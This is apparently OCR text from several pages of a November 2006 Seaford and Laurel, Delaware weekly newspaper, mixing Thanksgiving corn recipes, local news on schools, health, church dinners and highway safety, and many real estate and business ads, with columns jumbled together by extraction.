that the Indians provided the bulk of corn, corn muffin mix, sour cream and the the food for that first Thanksgiving feast. melted butter. Pour into a greased casseCorn was the most important crop of role dish and bake for 45 minutes, or until the northeast Indians. All varieties were golden brown. grown — white, blue, yellow and red — Remove from oven and top with chedand all parts of the plant were used. Husks were braided and woven into masks, moc- dar. Bake for an additional 5 to 10 minutes, or until cheese is melted. casins, sleeping mats, baskets, and cornLet stand for 10 minutes and serve husk dolls. Corncobs were used for fuel warm. and to make darts and rattles. Some of the grain was dried to preserve Corn and Wild Rice Pudding for the winter months in the form of Serves 6 to 8 hominy. Some was ground into corn meal that was used for bread, syrup and pud2 eggs ding. 1 egg yolk The Europeans knew nothing about 1 cup heavy or whipping cream corn before they met the Indians. Today, 2/3 cup milk more farmland in this country is used to 4 ears sweet corn, blanched and kernels grow corn than any other grain. removed from If you want to make your Thanksgiving cobs, about 3 feast more authentic, cups corn add what the Iro1 cup cooked wild quois prayer calls If you want to make your rice “the sacred food, our 3 scallions, finely sister corn.” Thanksgiving feast more chopped enough Here are two corn authentic, add what the Iroquois to make 1/3 cup pudding recipes, one 1 1/2 teaspoon traditional and one prayer calls “the sacred food, our cayenne pepper elegant. Both are 1 1/2 teaspoons salt yummy. sister corn.” 1/8 teaspoon grated fresh nutmeg 1/2 tablespoon butter Paula Deen’s Corn Casserole Serves 6 to 8 Preheat oven to 325 degrees. In a large bowl, combine egg, egg yolk, 1 15 and 1/4-ounce can whole kernel corn, heavy cream and milk and whisk well to drained combine. Add all remaining ingredients 1 14 and 3/4-ounce can cream-style corn except butter and mix well. 1 8-ounce package corn muffin mix (Jiffy Grease a 7- by 11-inch or 8- by 12-inch works well) casserole with the butter. Pour custard in1 cup sour cream gredients into prepared casserole and bake 1/2 cup (1 stick) butter, melted uncovered for 45 minutes, or until custard 1 to 1 and 1/2 cup shredded cheddar is set and golden brown on the top. Serve cheese warm. From Emeril Lagasse Preheat oven to 350 degrees. The Practical Gourmet Visit with Santa 2-4 pm Holiday Open House Sunday, November 26 thth 12-4 Special Arrangements for Thanksgiving and Christmas MYSTERY DISCOUNTS • REFRESHMENTS DOOR PRIZES • A ROSE FOR THE LADIES 07 FREE 20 rs Calenda John’s Four Season’s Flowers & Gifts Stein Hwy. at Reliance, John Beauchamp 302 629-2644 410 754-5835 628-9000 302 107 Pennsylvania Ave., Seaford, DE 19973 REDUCED!!!!! Picture yourself in this lovely rancher for the holidays!!!!!! 4 bedroom, 2 bath, new kitchen, new flooring, new roof, new windows and much more. This lovely home is located on the west side of Seaford on 1.19 acres. Also has a very large workshop/garage with many possibilities. $244,900 MLS 537713 BEAUTIFUL NEW CONSTRUCTION IN SEAFORD. 3 Bedroom, 2 bath, vaulted ceilings, kitchen appliances, gas fireplace and more. Construction to start ASAP. Being built by a wellknown very reputable local company. Call today for complete spec sheet $220,500 MLS542647 WONDERFUL INVESTMENT 0R 1ST TIME BUYER HOME!!!!! 3 bedroom, 1.5 bath, many possibilities with a little TLC. New roof, new vinyl….Priced to sell. $99,330 MLS 542637 BEAUTIFUL PARCEL IN LAUREL, improved by a very well-kept 2000 Clayton mobile home. Over 5 acres in the Delmar School District. 3 bedroom, 2 bath split floor plan. Property also has spacious 26x24 detached garage. $198,750 MLS 542632 Wishing you and your family a very happy and healthy Thanksgiving. Dan a Capl an 302-249-5169 BRAND NEW HOMES IN SEAFORD FOR UNDER $200,000!!!!!!!! Wonderful opportunity for the 1st time buyer….3 bedroom, 2 bath, lovely kitchen with appliances. Call today for the complete spec sheet. $180,600 MLS 542642 and MLS 542648 BEAUTIFUL, ROOMY & WAITING FOR YOU!!!!! 2001 Doublewide Clayton on a lovely 1.77 acre lot in Delmar. 3 bedroom, 2 bath vaulted ceiling in family room, formal dining room, large eat-in kitchen with center island, very large master suite with separate garden tub and shower, lots of closet space. Huge deck that leads to lovely above ground pool. Recently reduced!!!! VERY MOTIVATED SELLERS $167,900. MLS 540902 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 12 Delaware’s Growth Model approved by USDOE The U.S. Department of Education recently announced that Delaware is one of only three states to have their “Growth Model” approved under the guidelines of No Child Left Behind (NCLB). Just one year ago, U.S. Secretary of Education Margaret Spellings announced a pilot program where states who were closing achievement gaps and increasing student achievement could submit proposals to help strengthen their accountability standards. Secretary Spellings stated that no more than ten high-quality growth models would be approved in 2006. Delaware’s growth model is based on individual student achievement over time and will allow Delaware to look at individual student growth from year to year rather than comparing one class to another. “The growth model selected by Delaware for the pilot program is similar to one that had been developed prior to the No Child Left Behind Act of 2002,” said Robin Taylor, Associate Secretary for Assessment and Accountability. “For years, Delaware has had the necessary data systems and infrastructure, assessments for multiple years in the areas of reading and math in contiguous grades, and a model designed to hold schools accountable for all students being proficient by 2013 – 2014. Today’s announcement just further enforces our work to ensure all students succeed.” The approved growth model was developed by a statewide NCLB stakeholder group including teachers, building level administrators, administrators’ association, special education coordinators, Title I coordinators, curriculum directors, local chief school officers, State Board of Education, parents, business community, advocacy groups, and local boards of education. In order for the growth model to be approved by Washington, Delaware’s accountability system must meet seven core principles as outlined by USDOE. Those principles are: The proposed accountability system must ensure that all students are proficient by 2013-2014 and set annual goals to ensure that the achievement gap is closing for all groups of students. The accountability system must establish high expectations for low-achieving students that are not based on student demographic or school characteristics. The accountability system must establish high expectations for low-achieving students that are not based on student demographic or school characteristics. All students in the tested grades must be included in the assessment and accountability system; schools and districts must be held accountable for the performance of student subgroups; and the accountability system must include all public schools and districts in the state. Annual assessments in reading/ language arts and math in each of grades 3-8 and high school must have been administered for more than one year, must produce comparable results from year to year and grade to grade, and must be approved through the peer review process for the 2005-06 school year. The accountability model and state data system must track student progress. The accountability system must include student participation rates in the state's assessment system and student achievement on an additional academic indicator. Delaware will now report the traditional school accountability information as well as the growth model information side by side in school report cards when that information is released. $202,000 in refund checks are returned to the IRS The Internal Revenue Service is looking for 264 Delaware taxpayers who can claim their share of undeliverable refund checks totaling approximately $202,000. The IRS can reissue the checks, which average $766, after taxpayers correct or update their addresses with the IRS. In some cases, a taxpayer has more than one check waiting. Nationally, there are 95,746 taxpayers with undeliverable refunds, totaling approximately $92.2 million with an average refund of $9." re- fund. with undelivered refund checks who access "Where's My Refund?" by phone will receive instructions on next steps. Individuals whose refunds were not returned to IRS as undeliverable cannot update their mailing addresses through the "Where's My Refund?" service.. How to Address with the IRS. "Where's My Refund?" now has an online mailing address update feature for taxpayers whose refund checks were returned to the IRS. If an undeliverable check was originally issued within the past 12 months, the taxpayer will be prompted online to provide an updated mailing address. The address update feature is only available to taxpayers using the Web version of "Where's My Refund?" Taxpayers 500 W. Stein Highway • FAX (302)629-4513 • (302)629-4514 22128 Sussex Highway, Seaford, DE 19973 • Fax (302)628-8504 • (302)628-8500 • (800)966-4514 • • Dee Cross, CRS, GRI Broker Only 3 years old in desirable Clearbrooke Estates, this professionally landscaped, 4 BR, 3 BA Cape Cod style home features cathedral ceilings, gas FP in great room, formal DR, breakfast nook, ceramic tile, hardwood laminate & vinyl floors, CA, gas heat, ceiling fans. Irrigation, 2-car attached garage, fenced-in backyard, ceramic tiled patio & handicap access from rear of home complete the package. $295,000 (542836) Just Beclaus… DELIVERED WEEKLY $17.00 ONE YEAR Laurel Star 22128 Sussex Hwy. Seaford, DE 19973 628-8500 Office EXT. 132 Please send Seaford Star To: Name___________________________________ Address:_________________________________ SUSSEX COUNTY ONLY City __________ State ____Zip ______________ Kent & New Castle Counties, Delmar, MD and Federalsburg, MD, $20 Out of State $27 Send Gift Card From: ______________________ YOUR NAME SUBSCRIPTION TO START JANUARY 4, 2007 Mail to: Morning Star Publications, PO Box 1000, Seaford, DE 19973 or Call 302-629-9788 with Credit Card Payment MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 13 Health National Influenza Vaccination Week By Dr. Anthony Policastro Every year we experience a flu epidemic. Some years the epidemic is mild. That was true in 2005 – The United States Department of Health and Human Services as joined with several other nationwide groups to raise influenza vaccine awareness.risk. Dr. Pankaj Sanwal of RAINBOW PEDIATRICS proudly welcomes Dr Vibha Sanwal, MD, FAAP starting December 21, 2006 and announces the opening of a second location on December 1st at 16391 Savannah Road, Lewes. Dr. Vibha Sanwal, Board Certified Pediatrician currently with Nemours Pediatrics in Georgetown (an affiliate of DuPont Children’s Hospital), will be welcoming new patients, Dr. Vibha Sanwal will be seeing patients at both locations, Lewes and Georgetown. All major medical Insurance’s, including Medicaid, welcome. Evening, weekend appointments available. Please call for an appointment 21141 Sterling Ave., unit 1 Georgetown, DE 856-6967, Fax 855-0744 16391 Savannah Road Lewes, DE 856-6967, Fax 645-6457 PAGE 14 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 Easter Seals recognized for excellence The Board of Directors of Easter Seals Delaware and Maryland’s Eastern Shore was recently honored by the national office of Easter Seals with the Excellence in Affiliate Board Leadership Award which recognizes outstanding affiliate board performance and leadership. This is the second time this year that the Delaware affiliate of Easter Seals has received a national award. The award was presented to Easter Seals Board chairman, Robert J.A. Fraser, and Easter Seals president and CEO Sandy Tuttle at the Easter Seals National Convention in October. Nominees are evaluated on nine key criteria within critical board responsibilities, including: support of Easter Seals mission; oversight of Easter Seals chief executive officers for effective organizational planning; securing adequate resources to fund wellmanaged services; ensuring ethical and legal integrity and accountability; recruiting new board members; and enhancing Easter Seals public image. Currently, there are 27 directors on the board. Through com- bined efforts, the board secured $250,000 for the 2005 fiscal year, and contributed more than $1.5 million toward the local affiliates’ capital campaign. In May, the Easter Seals board received the Excellence in Comprehensive Development Award in the category of “Best Giving and Getting Board.” This award specifically recognizes the board’s involvement and commitment to fundraising efforts. Easter Seals provides services to ensure that all people with disabilities or special needs and their families have equal opportunities to live, learn, work and play in their communities. For more information, call 1800-677-3800 or visit. easterseals.com. Donald T. Laurion, D.O., F.A.C.C. Cardiologist DOMESTIC VIOLENCE AWARENESS - In recognition of October as Domestic Violence Awareness Month, Verizon Foundation (the philanthropic arm of Verizon Communications) and Verizon Wireless awarded over $100,000 to eight Delaware nonprofits to support domestic violence prevention and education efforts. Awards were presented at Hotel DuPont during the annual meeting and luncheon of the Delaware Coalition Against Domestic Violence. From left to right are Jennifer Gunther, VSA Arts of Delaware; Margaret Rose Henry, Delaware Technical & Community College; Tom Jewitt, Catholic Charities, Inc. of the Diocese of Wilmington; William Allan, Verizon Delaware; Christine Baron, Verizon Wireless; Dawn Schatz, Child, Inc.; Eleanor Kiesel, Community Legal Aid Society, Inc.; Geri Lewis-Loper, Delaware Center for Justice; Linda O’Neal, Delta Outreach and Education Center, Inc.; Abner Santiago and Maria Matos, Latin American Community Center. Alvaro Buenano, M.D., F.A.C.C. Cardiologist Angel E. Alicea, M.D., F.A.C.C. Cardiologist Richard P. Simons, D.O., F.A.C.C. Cardiologist “we’re proud that Nanticoke was named best in the state for response to emergency heart cases.” In the September 28, 2006, edition of the News Journal, Nanticoke was cited for our excellence in emergency response to heart attacks. The rankings were the result of an analysis performed by the federal Centers for Medicare & Medicaid Services. We credit our physicians, technicians, nurses, support staff, volunteers, auxiliary and board members for delivering on our AMERICAN MOTHERS MAKE DONATIONS - The Delaware Chapter of American Mothers Inc. recently presented three $1,000 checks to the pregnancy centers in each county of the state. Those presenting the check to the Sussex Pregnancy Center are from left, Doris Kowalski, Rita Denney, the executive director, Dusty Betts and Joyce Schaefer, the state president. The Delaware chapter of American Mothers Inc. is a member of the same national organization that encourages each state to honor a Mother of the Year for her efforts to strengthen the moral and spiritual foundations of her home and whose public service in her community has been widely recognized. MEMORIAL HOSPITAL A renewed spirit of caring. 801 Middleford Road • Seaford, DE 19973 promise to provide a higher quality of care. Because of them, our renewed spirit of caring is touching more lives and helping more people than ever before. To read the article in its entirety, visit or call us at 1-877-NHS-4DOCS for a reprint. MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 15 Consortium seeks funds for HPV Vaccine Initiative The Delaware Cancer Consortium (DCC) recently requested $800,000 from the Delaware Health Fund Advisory Committee to support a vaccination program to prevent cervical cancer among Delaware’s estimated 29,000 uninsured and Medicaid females ages 9-26. The request is part of DCC’s goal to reduce the state’s cervical cancer incidence and mortality, which is part of their action plan for 2007-2010. Delaware’s cervical cancer five-year age-adjusted mortality rate ranks 45th in the nation, with 50 being the worst. Between 1999 and 2003, 76 Delaware women died of the disease and the state’s rate was 22.8% higher than the national. Human papillomavirus (HPV) is a sexually transmitted disease in a group of viruses that includes more than 100 differ- ent strains or types. Most people who become infected with HPV will not have any symptoms and will clear the infection on their own. However, some of these viruses are called "high-risk" types which may lead to cervical cancer. A vaccine, released in June, targets the strains of HPV responsible for 70 percent of cervical cancers. The vaccine is approved for use in girls and women ages 9- 26 and should be given before they become sexually active. The vaccine offers no protection to women who have already been exposed to HPV. The vaccine would be distributed in 2007 as part of the “Ending Cervical Cancer in Our Lifetime” program, an initiative started in 10 states in August 2006, and coordinated by Lt. Governor John Carney of Delaware. Get out and play by John Hollis GROWING UP HEALTHY In a recent opinion poll commissioned by Nemours, 58 percent of Remember, the daily Delaware parents reported that hour of physical activity their children get less than the recommended hour of physical activithat is recommended for ty every day. children doesn’t necesIn fact, according to their parsarily mean a solid hour ents, over one in 10 (13 percent) Delaware children only get an hour of running or biking. of exercise twice a week, or less! throw around a frisbee, play catch, play Bulletin to parents and caregivers: chilhopscotch, rake leaves together. If the dren need moderate to vigorous physical weather doesn’t cooperate, put on a CD activity every day. It should be an enjoyand dance, get a good family exercise or able part of their daily lives, and adults yoga video, play Twister, do household play a vital role in making sure that it is. chores that involve bending and stretchWhy is daily physical activity so iming. Also, take advantage of your local portant? YMCA, Boys and Girls Club or PAL Club * It is good for kids to get their hearts - they often have a wide range of propumping - when the heart beats faster, it grams for children of all ages. For more gets strong. ideas, go to. * Physical activity gives kids energy, Remember, the daily hour of physical helps with concentration and is a natural activity that is recommended for children mood lifter. doesn’t necessarily mean a solid hour of * When kids are moderately to vigorrunning or biking. It can be done in increously active, they often feel better, sleep ments throughout the day: Play tag for 20 better and think more clearly. * Exercise gets kids away from screens minutes, vacuum for 10, walk the dog for 30, and you’re there! - TV, video games, instant messaging Be creative, be committed, and in the which are sometimes violent and/or sugwords of a famous shoe brand, just do it. gestive, contain ads for unhealthy prodChildren who are active are far more ucts, and are awfully good at luring kids likely to be active as adults and better able to spend far too many hours just sitting. * Regular physical activity is one of the to maintain a healthy weight and good overall health throughout their lives. most important factors in helping children achieve or maintain a healthy weight. John Hollis is director of Community If you want your children to be active, Relations for the Nemours Health and get out and play with them. Take walks, Prevention Services. go to the park or playground, ride bikes, David L. Crooks, M.D . will be leaving the practice of Nanticoke Surgical Associates December 1, 2006 URGENT CARE DELIVERY SERVICE OUR SPECIALTY H. PAUL AGUILLON, MD Call us anytime. We’ll be happy to deliver your low-priced prescriptions and drug needs at no extra charge. BI-STATE PHARMACY Dr. Stephen Care y a nd Dr. Samuel Miller will continue to provide ongoing care! PHYSICAL THERAPY Edward M. Asare, Pharmacist 5 East State St., Delmar, DE 19940 302-846-9101 Hrs: 9 am-7 pm Mon.-Fri.; 9-3 Sat. PAGE 16 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 stated, “Our vision for the Delaware Hospice Center developed from a statewide needs assessment that we undertook several years ago, which clearly indicated that citizens of Delaware needed and desired expanded options for end-of-life care. Today we take the next step to fulfill our promise and intention to respond to those needs.” The future Delaware Hospice Center will feature sixteen patient and family suites, a Family Support and Counseling Center, a Community Resource Center, a Meditation Room, and new offices for our home-based services and administrative staff. Families will be able to enjoy the kitchens, dining rooms and sitting rooms with alcoves for visiting children to play. The center will be available to patients of all ages. Professional hospice care will be available 24 hours a day, seven days a week. Special recognition was given to campaign co-chairs, Llaird and Peg Stabler; and to significant contributors to date, including: Mike Harrington, Lillian Burris, Bob Dickerson and Lida Wells, the team leaders of support committees; the Welfare Foundation; The Longwood Foundation; Crystal Trust; the State of Delaware; the Bank of America; and the Carl M. Freeman Foundation. To learn more about the Delaware Hospice Center and the Community Campaign to Expand Delaware Hospice, contact Manny Arencibia, vice president of development, 800-838-9800 x131 or visit. PAIN MANAGEMENT & REHABILITATION GANESH BALU, M.D. • KARTIK SWAMINATHAN, M.D. • MANO ANTONY, M.D. • ALFREDO ROMERO, M.D. Worker’s Comp. Injuries Auto Accidents Chronic Neck & Back Pain Medications X-Ray Guided Injections EMG Testing Massage Therapy Ne Acc w ept Pa i n tie g nt s New Location 34446 King Street Row Unit 2 Old Towne Office Park Lewes, DE 19958 (302) 645-9066 742 S. Governor’s Ave. Opp. Kent General Hosp. Dover, DE 19904 (302) 734-7246 8957 Middleford Road Near Nanticoke Hosp. Seaford, DE 19973 (302) 628-9100 Sleep Through Your Pain Management Injections Specializing In Glaucoma Treatment & Surgery Dr. Ortiz is a graduate of Swarthmore College and earned his medical degree from New York Medical College. Dr. Ortiz completed his Ophthamology residency at the Scheie Eye Institute, University of Pennsylvania. This was followed by a glaucoma fellowship at Addenbrooke’s Hospital in Cambridge, England. He completed a concurrent fellowship in ocular immune disease at Moorfield’s Eye Hospital in London.. • Sussex County, Georgetown State Service Center, 856-5213 • Sussex County, Shipley State Service Center, 628-2006 For more about flu clinic locations and dates, go to do D fre o, M l A er m Ro Dr. Ortiz is a diplomat of the American Board of Ophthalmology and a member of the American Glaucoma Society. He has been practicing ophthalmology since 1983 specializing in: Joseph M. Ortiz, MD • Glaucoma Management • Glaucoma Surgery • Dry Eyes • Pterygium • Eyelid Lesions. (302) 678-1700. NOW ACCEPTING NEW PATIENTS MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 17 Laurel School Board discusses impact of new developments on school district By Mike McClure Laurel School Board president Calvin Musser brought up the issue of the impact of new developments on the Laurel School District for discussion during last Wednesday’s school board meeting. The board also watched and participated in a presentation by kindergarten teachers and students from Paul Laurence Dunbar Elementary School. Although the issue wasn’t on the agenda, Musser brought up the issue of new developments in the school district and their impact on Laurel schools. Musser said 11 new developments have come to the district since January. He believes the district should receive impact fee money to help offset the additional resources that will be needed to accommodate additional students from the developments. Vice president Jerry White said the issue would have to be addressed by the state through legislation. Musser pointed out that three or four of the developments are within Laurel’s town limits and that the town could designate an impact fee to help the schools out with added growth. At the beginning of Wednesday’s meeting, Pam McCumbers and Dawn Williams and some of their students made a presenta- The Laurel School Board will hold a special meeting hursday, Nov. 30, to discuss the federal law No Child Left Behind and the effects of growth on the district. The regular December meeting will take place Dec. 6. tion on kindergarten calendar time. The students, with help from their teachers, school board members, and members of the audience, demonstrated some of the things they do at the start of their school day. In other board business, the board was notified that inclement weather in-town bus transportation will be provided for secondary students. Bus transportation will be provided for secondary students in grades 7-12 who live in the walking area. The transportation will begin Dec. 4 and end April 5. The bids have been submitted for two buses at $82 per day for 77 days and will be paid for through a grant. School board member Harvey Hyland reported that he attended a Delaware School Board Association meeting recently. The board is looking at sharing school plans for stock designs to eliminate the need for new blue prints. According to Hyland, it was also reported at the DSBA meeting that there will be no state funding for stipends for student teachers. Kindergarten students from Paul Laurence Dunbar Elementary School demonstrate some of the things they do at the start of the school day. The demonstration took place during last Wednesday’s school board meeting. Photo by Mike McClure LEGION DONATION - Chris Otwell, director of Boys and Girls Club of Laurel, accepts a $200 donation from Helen E. Pepper, president of the Ladies Auxiliary of the American Legion Unit 19 of Laurel, at the post home. The donation will be used for the club’s projects. Picture by Carlton D. Pepper. 18 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 Finisha Hopkins and her daughter, Rodnique’, put up a sign to advertise a dinner at the United Deliverance Bible Center, Laurel. Photo by Pat Murphy Area churches reach out to hungry to feed them a Thanksgiving dinner By Debbie Mitchell The words “anyone welcome” and “free to all” adorned marquees and posters last week as local church groups reached out to members of the community to offer them a Thanksgiving meal. “People are down this time of year and we want to reach out and share our blessings,” said Teri Vann, spokeswoman for the United Deliverance Bible Center in Laurel. At her church, the smells of roasted turkey and all the trimmings filled the air as busy volunteers prepared for this year’s dinner, which was served Saturday, Nov. 18. The United Deliverance Bible Center first held a community pre-Thanksgiving dinner in 2000 as a part of the church’s mission outreach program, Helping Hands, of which Vann is a member. This year, the dinner, which was held at the Bible Center, was also sponsored by St. Matthews, Victory in Grace Tabernacle, New Beginnings Christian Center, Emmanuel’s House and Sussex Mass Community Choir. People who visited the church for the dinner were greeting by smiling faces like that of Donald Hitchens. In addition to the meals served in the church, Hitchens and more than 25 volunteers delivered meals to people in the Laurel, Seaford, Millsboro and Delmar areas. According to Vann and Helping Hands president Edith Hood, the church has served as many as 400 meals. Planning begins a year ahead of time and the donations come from churches, members of the community and organizations, Hood said. “We visit the elderly and sick who can not get out,” Vann said. “We take a moment to sit and talk with people too.” A constable for the state of Delaware, Vann added that she sees this as an opportunity to plant a seed. “We definitely see a change in heart and spirit,” she said. And helping with the dinner benefits the volunteers, she added. “I aspire to inspire before I expire,” she said. From baking to packing, delivering to serving, there is a job for everyone at the dinner. Even the teens pitch in. “I think it is great helping the community for their needs,” said 13-year-old Rodnique Hopkins. “It makes me feel great and one day someone might need to do it for me. God will bless us.” New Zion Church in Laurel has been serving weekly meals for 10 years. In addition, the church hosts an annual community holiday meal. This year’s dinner will be served today, Nov. 22. The church planned to serve about 100 meals to young men who have lost work, people in poor health, shut-ins and the elderly. According to 78-year-old Ethel Fooks, “This is a celebration of the year and of God’s abundance to the food mission.” Centenary United Methodist Church, Laurel, hosted its community meal on Sunday, Nov. 19. Organizers Midge McMasters and Mimi Boyce head up dozens of Centenary volunteers who have served close to 150 people, including 50 shut-ins. The group has been serving the Thanksgiving dinner for more than 10 years. According to pastor John Van Tine, there is a real need for such a meal. “Our food pantry has been heavily used in the past week,” he said. “The dinner benefits a lot of people. It helps not only those in financial need, but those who wish to have the fellowship.” Police, town unite to help those in need The Laurel Police and and the town’s Public Works departments have joined forces to help needy families this holiday season. They are sponsoring the No Child Without a Toy program. Donations of gifts including new unwrapped toys, gift cards, new winter coats, hats and gloves are needed. For more information, contact Chief Jamie Wilson at 875-2244 or Public Works director Woody Vickers at 8752277. Donations can be dropped off at the Laurel Police Department or at Laurel Town Hall, Monday through Friday, 8 a.m. to 4 p.m. CUB RACERS - Cub Scout Pack 90 of Laurel participated in a Cub Mobile Derby Saturday, Nov. 4, on Willow Street in Laurel. Winners were Nicholas Wilder, Chance Walls and Ike Wharton. Consolation winner was David Elliott. Above are Jacob Foy, Wolf Den Leader (left), and John Theis, Cub Master. Below are the participating Cub Scouts with one of their homemade derby cars. Chicken Salad & Dumpling Dinner Bake Sale & Silent Auction The friends of Joey Wheatley will be holding a benefit to help offset the rising medical costs for Joey’s ongoing cancer treatments. SUNDAY, DECEMBER 3 FROM NOON TO 5 PM Bridgeville Fire Hall, Bridgeville, DE $15.00/Adult $7.50 children under 12 Tickets available at Woodbridge School Dist. Office, Layton’s Hardware and A.C. Schultes of Delaware, Inc. in Bridgeville and Burton Bros. Hardware and Harley Davidson in Seaford, DE Sorry - no carry outs. HOPE TO SEE YOU THERE! MORNING STAR ✳ NOVEMBER 23 - 29, 2006 PAGE 19 Annual Safe Family Holiday Campaign begins This week launches the ninth annual Safe Family Holiday campaign sponsored by the Office of Highway Safety and its safety and law enforcement partners, which runs through New Year's Day. As Delaware families prepare for the holiday season, the Office of Highway Safety (OHS) is implementing traffic safety checkpoints, hundreds of patrols, public awareness messaging in the form of ads and billboards and several communitybased safety events. During this year's campaign, motorists can expect to see not only increased DUI enforcement but also increased efforts to stop aggressive drivers with a new initiative, "Operation Commute" to target aggressive drivers during the morning rush hour. Highway safety officials feel the timing of the campaign is particularly critical as traffic deaths are already up 3% over this time last year. Additionally, the risk of traffic crashes typically increases with the onset of the holiday season, primarily due to increased traffic volume from people visiting families during the three major holidays and shopping for gifts. DUI prevention will also be a major focus of safety and police agencies in the SFH campaign. A total of 33 sobriety checkpoints are scheduled between Thanksgiving and New Year's Eve as part of Delaware's high visibility "Checkpoint Strikeforce" initiative, coordinated by OHS. Delaware's MADD chapter, which will hold a candlelight vigil for victims of impaired driving in late December, is supporting the initiative by assisting officers at checkpoints. Delaware will also participate in this year's second National "Drunk Driving Over the Limit, Under Arrest" impaired driving crackdown by funding State and local police agencies to conduct DUI saturation patrols during the last two weeks in Dec. Updated campaign statistics for DUI and aggressive driving enforcement will be available Nov. 28 at. Community-based public awareness efforts include statewide posters encouraging children and adults to buckle up as well as the OHS "Mocktail" party, which features safety information and samples of "smart" party foods. The DUI Victim's Trees will be on display in DMV lobbies statewide and MADD red ribbons are also available. The campaign timeline is as follows: DUI Checkpoints - weekly November 23 - Jan. 1; DUI Saturation patrols - December 1 31, as part of "Drunk Driving. Over the Limit Under Arrest." National mobilization; "Stop Aggressive Driving Campaign" & "Operation Commute" patrols - weekly, Nov. 23 - Dec. 30; Christmas Tree Tag Distribution - OHS will distribute tags with a "don't drink and drive" message on them to local Christmas tree farmers during the first week in December; Mocktail Parties - OHS will hold three non-alcoholic cocktail or "mocktail" parties this year. Dec. 2 - 11 a.m. - 4 p.m. at the Dover Boscov's, Dec. 6th at the Georgetown DMV from 5 - 8 pm and Dec. 15 from 5-8 p.m. at the Wilmington DMV. DUI Victim's Tree - Each red light on the tree symbolizes an alcohol-related death, and each green bulb an alcohol-related injury in Delaware during the Safe Family Holiday campaign. Trees will be located in the lobby of the Dover DMV, the Georgetown DMV, and the Wilmington DMV. Brochure and MADD ribbon distribution - brochures on impaired and aggressive driving, and MADD red ribbons in support of the Tie One on for Safety campaign are available by calling 302-7442740. Food specialty store expected to occupy Video Den location By Lynn R. Parks The Stein Highway property that is home to Video Den has been sold. Former owner Jim Horne, Seaford, said that the new owners are “local people” who are bringing a “food specialtytype shop” to the area. “They have asked me not to say anything about what it is going to be,” Horne said. “I will say that it will be something different for Seaford. Something that you might expect out of the city.” Rumors have been circulating that a Panera Bread restaurant is coming to the site. Mark Crawley, spokesman for Panera Bread, based in Richmond Heights, Mo., said last week that he had no information about a Panera Bread coming to the area. That does not mean that one is not coming, he added. It could be that one is in fact coming, but its opening is so far in the future that the company is not ready to talk about it yet. Horne sold his business, which includes about an acre of land, in October. Since then, he said, the new owners have been in the building, taking measurements. “I believe they are going to redo the whole thing,” he said. Horne bought the video and photo-development business 12 years ago from his brother, Harold. He said that in recent years, business was in a steady decline. “There was no way for me to compete,” he said. He is happy, he said, to have sold the property. “I think that people will be happy with what is coming,” he added. L I M I T E D T I M E O F F E R * Extended hours for Downtown For the second year, the retailers on High Street in Downtown Seaford will be hosting an extended hours shopping night for all of your holiday needs. Retailers will open their doors until 9 p.m. on Friday, Dec. 1, and the Union United Methodist Church Choir and Bell Choir will provide musical entertainment for your enjoyment. The choir will perform Christmas Carols on the east end of High Street at 6 p.m., the bell choir will perform at the corner of High and Pine Streets at 6:30 p.m. and the choir will perform again at 7 p.m. on the West end of High Street. Participants include 2 Cats in the Yard, Cranberry Hill, Sand & Stone Creations, Bon Appetit, Serenityville, Carol Beth's gift baskets, Hamilton Associates, Eastern Shore Books and Coffee, The Browsery, the Seaford Museum and more! Visitors are encouraged to enjoy the holiday music, save with many holiday specials, and enjoy personalized service and gift wrapping in many locations. Gift ideas include unique specialty items, gourmet coffees and teas, antiques, decorative house wares including wreaths, pillows, throws, towels and more, handmade and designer soaps and lotions, jewelry and jewelry making items, gift baskets, holiday decorations, gift certificates and more! For more information, contact Trisha Booth at 629-9173. *Excludes Oakley and Maui Jim Frames. May not be combined with any other insurance or discount. Some restrictions may apply. Offer expires 12-31-06. PAGE 20 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 Superintendent reminds citizens how to request use of building Dr. David C. Ring Jr., superintendent of the Delmar School District, would like to remind citizens of the district’s procedures regarding requests to use the school building: • All requests must be approved by the Delmar Board of Education • The request must be submitted a month prior to the requested date • Request forms can be found in the district office • Those making the request must complete the responsibility release and the building request forms • They must then return the completed forms to the district office • The building principal will review the forms, check the master calendar, comGETTING IN THE SPIRIT - Laurel Middle School held its Spirit Night at Laurel Hardees on Monday, Nov. 13. Twenty percent of the evenings’ proceeds will go to the school to support incentives for better behavior. Included in the picture are Mary Bing, Nicole Ingley, Nicole Fook, Tucy Steele, Doug Brown, principal Jennifer Givens, Katie Coppoch, Carolyn Tyndall, Alyssa Givens, Brandon Steele, Marisa Lowe, Hardees manager Lori Bailey, Jennifer Bell, Ashley Healey and Sumika Dixon. Photo by Pat Murphy plete the attached fees and provide a signature • The request will be placed on the board’s monthly agenda for a final decision. Board meetings are held every third Tuesday of the month with the exception of November and December, when the meeting is held on the second Tuesday of the month • Immediately following the board meeting a letter will be mailed to the citizen with a final decision. Questions concerning the use of facilities should be directed to the school superintendent. He can be reached at 846-9544, ext. 104, or by e-mail at dring@delmar. k12.de.us. Delmar parade set for Dec. 2 The Delmar Christmas parade, sponsored by the Delmar Chamber of Commerce, will take place Saturday, Dec. 2, at 2 p.m. with a rain date of Dec. 3 (2 p.m.). Parade judges are needed for this year’s parade. Also, anyone interested in chairing the event next year may call Roger Mar- tinson at 410-430-6566. Parade applications are available at Delmar Town Hall. Applications will be accepted up to two days prior to the event. Anyone submitting late applications is asked to call Martinson. News items may be mailed to the Seaford and Laurel Star, 628 W. Stein Hwy., Seaford, DE 19973. Or they may be faxed to 629-9243. Procino-Wells, LLC Attorneys at Law 123 Pennsylvania Avenue, Seaford, DE 19973 302-628-4140 LIFE-SIZE DRAWINGS - Participants in Preschool Story Time at Laurel Public Library on Nov. 7 made life-size drawing of themselves. They received help from parents and older siblings. Additional “Me and My Family” programs will be held on Tuesdays, Nov. 14, 21 and 28 at 10:30 p.m. For more information about Preschool Story Time at the Laurel Public Library, call at 875-3184 or visit the the Web site. MUSICAL CELEBRATION - The Delmar High band plays in celebration of the Wildcat football team’s win over Hodgson in the first round of the state tournament. Delmar visits Caravel this Saturday night in the Division II semifinals. Photo by Mike McClure Michele Procino-Wells Shannon R. Owens • 